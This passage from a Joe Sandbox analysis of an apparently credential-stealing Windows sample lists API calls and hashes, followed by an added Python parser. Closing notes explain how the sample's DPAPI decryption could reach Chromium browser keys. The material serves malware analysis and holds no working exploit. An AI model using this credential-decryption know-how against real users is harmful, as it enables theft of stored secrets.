                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                              • Instruction ID: 1f588666e0e7aa56844be5e551cbc3b63a1353ff86c9a833289ad805ac3e7c7d
                              • Opcode Fuzzy Hash: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                              • Instruction Fuzzy Hash: C9118EB1945218EBEB248B54DC49FA9B7B8FB04721F1043AAE90A932C0C7745E40CF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <_$j-Zw$q5~
                              • API String ID: 0-3291620619
                              • Opcode ID: 298050493758bf2fc3470907fc4fcb0c2caeeddf1a83db20a4b4f862f2a7d2df
                              • Instruction ID: 2150ef86b6c1df8046009e3f48bb00e5b4a3197d7ddf769517f001b71a324460
                              • Opcode Fuzzy Hash: 298050493758bf2fc3470907fc4fcb0c2caeeddf1a83db20a4b4f862f2a7d2df
                              • Instruction Fuzzy Hash: D8B2F7F3A0C2049FE304AE2DEC8567AB7E9EF94720F16493DEAC4C7744E63558058697
                              APIs
                              • CoCreateInstance.COMBASE(0069E118,00000000,00000001,0069E108,00000000), ref: 00693758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006937B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                              • Instruction ID: 0f4ef3e6fc49777d548ae1741628951cd4b0fe33815c94a35db031d025648049
                              • Opcode Fuzzy Hash: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                              • Instruction Fuzzy Hash: F441D670A40A28AFDB24DB58CC95B9BB7B9BB48702F5041D8A609E72D0D7716E85CF50
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                              • LocalFree.KERNEL32(?), ref: 00689BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: ada9490dcf3bc5cd25617f332b816e108ec848b33719e55b838e03486324a2ff
                              • Instruction ID: 6027b0c97aa491739fdfec5dee9a173ccf9255376a5f5885c03fa9dfc1ea2ed7
                              • Opcode Fuzzy Hash: ada9490dcf3bc5cd25617f332b816e108ec848b33719e55b838e03486324a2ff
                              • Instruction Fuzzy Hash: D911CCB4A00209DFDB04DFA4D985EAE77B5FF88304F104558E915A7350D774AE10CF61
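The entries above list raw call sequences (the Toolhelp32 process walk, CryptBinaryToStringA, the GetTimeZoneInformation/wsprintfA pair, CoCreateInstance with MultiByteToWideChar, and CryptUnprotectData with LocalAlloc/LocalFree) but leave the reader to work out what each one means. The Python below is an added example, not part of the Joe Sandbox report: it parses the "APIs" blocks in the format printed on this page (the four visible blocks are embedded verbatim as sample input), reproduces the report's API ID strings with a token rule reconstructed from the IDs printed here (an assumption about how Joe Sandbox derives them, verified only against these entries), decodes the CryptBinaryToStringA dwFlags value 40000001 as CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF (wincrypt.h constants), and flags that CryptUnprotectData is called with a NULL pOptionalEntropy. The behaviour labels are the editor's own, not Joe Sandbox signatures; the Process32 API names used in the usage check are inferred from the "Process32$CloseCreateFirstHandleNextSnapshotToolhelp32" API ID above.

```python
"""Turn the per-function 'APIs' blocks of a Joe Sandbox report into a behaviour
summary. Sample input below is copied verbatim from this report's entries."""
import re
from collections import Counter

# Constructed sample: the four "APIs" blocks visible in this section of the report.
SAMPLE_REPORT = """\
APIs
• CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
Memory Dump Source
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
• RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0148E458,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
• wsprintfA.USER32 ref: 00697AB7
Memory Dump Source
APIs
• CoCreateInstance.COMBASE(0069E118,00000000,00000001,0069E108,00000000), ref: 00693758
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006937B0
Memory Dump Source
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
• LocalFree.KERNEL32(?), ref: 00689BD3
Memory Dump Source
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR"; the argument list is absent for wsprintfA.
CALL_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_functions(text):
    """Return one list of call dicts per 'APIs' block, in report order."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.append({"name": m.group("name"), "module": m.group("module"),
                            "args": args, "ref": int(m.group("ref"), 16)})
    return functions


TOKEN_RE = re.compile(r"[A-Z][a-z]*\d*|[a-z]+\d*")


def api_id(names):
    """Joe-style API ID: CamelCase tokens shared by several APIs, then '$', then the
    remaining tokens, both ASCII-sorted; fragments shorter than four characters
    (Get, Rtl, Co, To, A/W suffixes) are dropped. Reconstructed from the IDs printed
    in this report, not taken from Joe Sandbox's code (assumption)."""
    per_api = [{t for t in TOKEN_RE.findall(n) if len(t) >= 4} for n in names]
    counts = Counter(t for toks in per_api for t in toks)
    shared = "".join(sorted(t for t, c in counts.items() if c > 1))
    rest = "".join(sorted(t for t, c in counts.items() if c == 1))
    return f"{shared}${rest}" if shared else rest


# wincrypt.h values for the dwFlags argument of CryptBinaryToStringA.
CRYPT_STRING_BASE64 = 0x00000001
CRYPT_STRING_NOCRLF = 0x40000000


def decode_crypt_string_flags(hexarg):
    flags = int(hexarg, 16)
    fmt = flags & 0xFFFF
    parts = ["BASE64"] if fmt == CRYPT_STRING_BASE64 else [f"fmt=0x{fmt:x}"]
    if flags & CRYPT_STRING_NOCRLF:
        parts.append("NOCRLF")
    return "|".join(parts)


# Editor's own mapping from call sets to behaviours (assumption, not Joe Sandbox signatures).
BEHAVIOURS = [
    ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}, "enumerates running processes"),
    ({"CryptUnprotectData"}, "decrypts DPAPI-protected data"),
    ({"GetTimeZoneInformation", "wsprintfA"}, "formats the host time zone into a string"),
    ({"CryptBinaryToStringA"}, "encodes binary data as text"),
    ({"CoCreateInstance"}, "instantiates a COM object"),
]


def classify(calls):
    names = {c["name"] for c in calls}
    found = [label for needed, label in BEHAVIOURS if needed <= names]
    for c in calls:
        if c["name"] == "CryptBinaryToStringA" and len(c["args"]) >= 3:
            found.append("CryptBinaryToStringA flags: " + decode_crypt_string_flags(c["args"][2]))
        # Third argument is pOptionalEntropy; NULL means a plain user-scope DPAPI blob.
        if c["name"] == "CryptUnprotectData" and len(c["args"]) >= 3 and c["args"][2] == "00000000":
            found.append("DPAPI call uses no optional entropy")
    return found


def summarize(text):
    return [{"api_id": api_id([c["name"] for c in calls]),
             "refs": [f"{c['ref']:08X}" for c in calls],
             "behaviours": classify(calls)} for calls in parse_functions(text)]


if __name__ == "__main__":
    for entry in summarize(SAMPLE_REPORT):
        print(entry["api_id"], entry["refs"], "->", "; ".join(entry["behaviours"]))
```

Two of the decoded details matter to an analyst reading this report: base64 with CRYPT_STRING_NOCRLF produces a single-line string, the form needed to drop data into an HTTP form field or header rather than a file; and a CryptUnprotectData call with no optional entropy and dwFlags 0 decrypts any user-scope DPAPI blob of the logged-on user, which is the protection applied to, among other things, the local encryption key of Chromium-based browsers. Neither fact identifies what this sample decrypts or sends; that would need the decrypted buffers or the network capture, not the API listing.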
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "{]$vy
                              • API String ID: 0-2703474962
                              • Opcode ID: bc83f0e908aa1c2706a01eb6383b45394ce5acbde0f575e8eb2673fcbf87155b
                              • Instruction ID: 0fd5c5e1707b1a2c0437dabba38ab9d4378d1a37c616dc81460f5e3112a95e23
                              • Opcode Fuzzy Hash: bc83f0e908aa1c2706a01eb6383b45394ce5acbde0f575e8eb2673fcbf87155b
                              • Instruction Fuzzy Hash: ACA2E4F36082049FE3046E2DEC8577AFBE9EF94720F1A493DEAC483744EA7558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7.k$?N&w$TL2
                              • API String ID: 0-4171604338
                              • Opcode ID: 1e6f77e0390bc83c4f23775ccc1b7fe275251a9df23e9060b22de8486beb5201
                              • Instruction ID: 04d49e229ee6fc3762edfd83df0e31cacadc54a3eba9b2006081b21a3f0da8b2
                              • Opcode Fuzzy Hash: 1e6f77e0390bc83c4f23775ccc1b7fe275251a9df23e9060b22de8486beb5201
                              • Instruction Fuzzy Hash: 577148F3E186105BF318993EEC9433BF6D69BD4720F2B853D9A88E3784E8795C064295
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                               • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '5:
                              • API String ID: 0-366166751
                              • Opcode ID: f2cbd654db54107b8d21636384e912d3778ffd489128c7e78f0cf43189271f1d
                              • Instruction ID: 14a3f57292fd1840c413728726ab148b08eb515707af71ac3fd09f3c9af63886
                              • Opcode Fuzzy Hash: f2cbd654db54107b8d21636384e912d3778ffd489128c7e78f0cf43189271f1d
                              • Instruction Fuzzy Hash: 36612CF3A183109BF700AE2DDC8576ABBD9EF94720F2A493DE6C4C7744E53598048687
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e22c9980753f09da86168f17c131d2fd991849e9fdb4c729f0e6b3210ef323a0
                              • Instruction ID: 455068b3423d6ae62f76737016eaefbd24afb6687a74eb4e3301bd6f6eb8e0e3
                              • Opcode Fuzzy Hash: e22c9980753f09da86168f17c131d2fd991849e9fdb4c729f0e6b3210ef323a0
                              • Instruction Fuzzy Hash: 5A61F6F3E082105BF3006A29EC8576ABBD5EB94324F1B463DDBD893380E93A5C1586C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f9131258f068bc27ac1af308448ff99d2147a7a33c484137a72089074f0d627
                              • Instruction ID: e927326248322b5cc55a2d01bd46cd36f7c50493bf6f7997e135b681fd7d50a9
                              • Opcode Fuzzy Hash: 4f9131258f068bc27ac1af308448ff99d2147a7a33c484137a72089074f0d627
                              • Instruction Fuzzy Hash: D76139F3E182245BF3586929EC957BAB7D5DB94760F1B453EEB8853780E93E0C0142C5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3d7c97fa4f548b8c81694a4092ec58f9baeb63c5e42d80f63f16c1040b978e1d
                              • Instruction ID: 9e3400db71e60bbf4fa05687ba0106ee74163bea7526376dd4e4f4f94030de93
                              • Opcode Fuzzy Hash: 3d7c97fa4f548b8c81694a4092ec58f9baeb63c5e42d80f63f16c1040b978e1d
                              • Instruction Fuzzy Hash: E7412BF3E482148BE304593EEC94776BADAE7D4730F6B823DE99857788DC761C064191
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 814265e82b39b62dae95ce0239908d795cb2bccb2c31a0463becf8003ebdec65
                              • Instruction ID: 24409989235a5a9bdcd3b34c315eb2e86acb264dd28089c1aa9166503435ae88
                              • Opcode Fuzzy Hash: 814265e82b39b62dae95ce0239908d795cb2bccb2c31a0463becf8003ebdec65
